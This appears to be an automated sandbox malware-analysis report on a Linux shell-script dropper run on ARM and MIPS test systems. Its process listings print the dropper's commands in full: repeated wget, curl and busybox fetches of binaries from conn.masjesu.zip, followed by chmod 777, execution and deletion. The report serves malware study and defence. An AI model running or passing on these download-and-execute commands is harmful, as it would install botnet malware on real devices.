Analysis Overview
SHA256
c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653
Threat Level: Shows suspicious behavior
The file c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-29 02:53
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 02:53
Reported
2024-10-29 02:55
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
9s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh
[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-29 02:53
Reported
2024-10-29 02:55
Platform
debian9-mipsbe-20240611-en
Max time kernel
149s
Max time network
84s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | N/A |
| N/A | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | N/A |
| N/A | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | N/A |
| N/A | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | N/A |
| N/A | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | N/A |
| N/A | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | N/A |
| N/A | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | N/A |
| N/A | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | N/A |
| N/A | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | N/A |
| N/A | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | N/A |
| N/A | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | N/A |
| N/A | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | N/A |
| N/A | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | N/A |
| N/A | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | N/A |
| N/A | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | N/A |
| N/A | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | N/A |
| N/A | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | N/A |
| N/A | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | N/A |
| N/A | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | N/A |
| N/A | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | N/A |
| N/A | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | N/A |
| N/A | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | N/A |
| N/A | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | N/A |
| N/A | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | /usr/bin/curl | N/A |
Processes
/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh
[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/chmod
[chmod 777 ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N
[./ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/rm
[rm ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]
/bin/chmod
[chmod 777 MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]
/tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J
[./MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]
/bin/rm
[rm MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]
/bin/chmod
[chmod 777 ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]
/tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX
[./ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]
/bin/rm
[rm ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]
/bin/chmod
[chmod 777 lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]
/tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg
[./lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]
/bin/rm
[rm lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]
/bin/chmod
[chmod 777 dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]
/tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww
[./dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]
/bin/rm
[rm dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]
/bin/chmod
[chmod 777 Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]
/tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd
[./Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]
/bin/rm
[rm Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]
/bin/chmod
[chmod 777 VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]
/tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh
[./VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]
/bin/rm
[rm VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]
/bin/chmod
[chmod 777 tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]
/tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv
[./tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]
/bin/rm
[rm tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]
/bin/chmod
[chmod 777 mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]
/tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq
[./mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]
/bin/rm
[rm mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]
/bin/chmod
[chmod 777 Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]
/tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z
[./Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]
/bin/rm
[rm Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]
/bin/chmod
[chmod 777 H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]
/tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o
[./H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]
/bin/rm
[rm H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]
/bin/chmod
[chmod 777 MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]
/tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8
[./MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]
/bin/rm
[rm MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]
/bin/chmod
[chmod 777 Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]
/tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq
[./Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]
/bin/rm
[rm Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]
/bin/chmod
[chmod 777 dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]
/tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl
[./dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]
/bin/rm
[rm dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/chmod
[chmod 777 ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N
[./ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/rm
[rm ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]
/bin/chmod
[chmod 777 MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]
/tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J
[./MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]
/bin/rm
[rm MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]
/bin/chmod
[chmod 777 ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]
/tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX
[./ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]
/bin/rm
[rm ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]
/bin/chmod
[chmod 777 lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]
/tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg
[./lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]
/bin/rm
[rm lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]
/bin/chmod
[chmod 777 dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]
/tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww
[./dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]
/bin/rm
[rm dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]
/usr/bin/wget
